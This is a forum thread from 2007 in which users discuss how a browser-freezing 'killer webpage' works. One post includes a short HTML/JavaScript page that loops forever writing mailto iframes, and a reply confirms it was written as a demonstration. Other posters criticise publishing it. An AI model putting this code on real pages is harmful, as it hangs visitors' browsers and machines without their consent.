Forum Home
PC World Chat
 
Thread ID: 78390 2007-04-13 09:58:00 How does this work roddy_boy (4115) PC World Chat
Post ID Timestamp Content User
540812 2007-04-13 21:44:00 Dannz, how were you able to get the code?Easy. Just look at the source code of the page. Jen (38)
540813 2007-04-13 21:57:00 Easy. Just look at the source code of the page.I thought it was some leet linux code way lol
Urgh @ dopey me ... gonna be one of those days I feel :p
Myth (110)
540814 2007-04-13 22:40:00 Easy. Just look at the source code of the page.

It wasnt quite that easy.

When you go to that page, your pc freezes up pretty quick.

I used linux wget to grab the page, then ran it through a php script to get the human readable version.
Dannz (1668)
540815 2007-04-14 07:01:00 <html>
<head>
<meta http-equiv="refresh" content="5;filename.html" />
<script type="text/javascript">
var isrc = 'mailto: no-one';
while(true) document.write("<iframe src='"+isrc+"'></iframe>");
</script>
</head>
<body>
</body>
</html>

Is that another way of achieving this same killer webpage?


Why put it on a public forum yourself?

It's a disaster for anyone with a low-spec machine.
Just adding a disclaimer is a feeble excuse for something you knew could do harm.

I wanted to know how it worked. The disclaimer is there. I don't want people to freeze up their computers.
roddy_boy (4115)
540816 2007-04-14 07:28:00 Is that another way of achieving this same killer webpage?Yes. You asked how it was possible to achieve, so I wrote you a demonstration page. Erayd (23)
540817 2007-04-14 07:31:00 Yes. You asked how it was possible to achieve, so I wrote you a demonstration page.
You should have been the one that wrote it :p
Yours was much nicer than the one thats on that site :lol:
Dannz (1668)
1 2 3